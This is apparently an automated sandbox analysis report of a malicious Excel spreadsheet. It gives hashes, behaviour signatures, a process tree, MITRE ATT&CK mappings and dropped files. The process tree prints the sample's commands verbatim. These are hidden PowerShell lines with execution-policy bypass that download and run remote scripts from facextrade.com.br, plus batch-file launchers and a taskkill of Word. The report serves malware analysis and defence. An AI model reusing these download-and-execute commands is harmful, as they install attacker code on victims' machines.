Analysis

  • max time kernel
    153s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    16-08-2022 07:46

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.17500.xls

  • Size

    33KB

  • MD5

    72b9a844ed7ab767c1de85facfb4ad04

  • SHA1

    88d41799156fcc5c6dc80124cc55cc3f96d940b6

  • SHA256

    392de25228482e17400c27ca87cfe91ddf60b1dedcffd36cad1c52c6a0f7c4d0

  • SHA512

    7214899618bd9ec54db02340a86a345c5273d12c4694f29ebff0d5515fd1eec72b4b4a30f1a267d3e070d7a2d92dbb850ec5f1bec88f0509e103b6f380c9f28b

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.17500.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:548
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1520
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 80 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:900
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1180
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1344
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 85 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1684
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1876
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1092
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1996
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:624
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:432
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2008
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 7 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1688

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    9338ad28d300b58ddd541ef2dbe13ee5

    SHA1

    c7e237df4e072189852f649154cd079e741211c2

    SHA256

    6c203df91cecb761509afc92efe4d9bff3c00e2a6336030963948c8cac7fc13a

    SHA512

    56ba4e84735a40f1fc060bb78af66c885b3d12ccd525a3139d69d26d610875d40c1affd9aaf06f2e336f83654b88eefce1ee0f9b99c1cc76b83cb83fc490be04

  • C:\Users\Public\DefenderFile.bat
    Filesize

    1KB

    MD5

    ae4a0997ce01f4ebbb3f3cc0054ce933

    SHA1

    e5bfe3b390f1208b8b6ea0317f4364005f552851

    SHA256

    a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

    SHA512

    5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

  • C:\Users\Public\Outlook.bat
    Filesize

    900B

    MD5

    0427a3545c2eaed3167cffe2cf5f8aba

    SHA1

    b27f3a7d2b855f1d0b84727603add711bb6f6170

    SHA256

    ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

    SHA512

    fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

  • \??\PIPE\srvsvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • memory/432-73-0x0000000000000000-mapping.dmp
  • memory/548-60-0x0000000000699000-0x000000000069D000-memory.dmp
    Filesize

    16KB

  • memory/548-59-0x0000000000699000-0x000000000069D000-memory.dmp
    Filesize

    16KB

  • memory/548-78-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/548-58-0x00000000724FD000-0x0000000072508000-memory.dmp
    Filesize

    44KB

  • memory/548-75-0x00000000724FD000-0x0000000072508000-memory.dmp
    Filesize

    44KB

  • memory/548-57-0x0000000075AF1000-0x0000000075AF3000-memory.dmp
    Filesize

    8KB

  • memory/548-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/548-79-0x00000000724FD000-0x0000000072508000-memory.dmp
    Filesize

    44KB

  • memory/548-55-0x0000000071511000-0x0000000071513000-memory.dmp
    Filesize

    8KB

  • memory/548-54-0x000000002F381000-0x000000002F384000-memory.dmp
    Filesize

    12KB

  • memory/624-72-0x0000000000000000-mapping.dmp
  • memory/900-67-0x0000000000000000-mapping.dmp
  • memory/1092-70-0x0000000000000000-mapping.dmp
  • memory/1180-86-0x0000000073EE0000-0x000000007448B000-memory.dmp
    Filesize

    5.7MB

  • memory/1180-82-0x0000000000000000-mapping.dmp
  • memory/1344-62-0x0000000000000000-mapping.dmp
  • memory/1384-63-0x0000000000000000-mapping.dmp
  • memory/1520-61-0x0000000000000000-mapping.dmp
  • memory/1684-66-0x0000000000000000-mapping.dmp
  • memory/1688-68-0x0000000000000000-mapping.dmp
  • memory/1696-81-0x0000000000000000-mapping.dmp
  • memory/1876-65-0x0000000000000000-mapping.dmp
  • memory/1996-77-0x000000006BA60000-0x000000006C00B000-memory.dmp
    Filesize

    5.7MB

  • memory/1996-76-0x000000006BA60000-0x000000006C00B000-memory.dmp
    Filesize

    5.7MB

  • memory/1996-71-0x0000000000000000-mapping.dmp
  • memory/2008-64-0x0000000000000000-mapping.dmp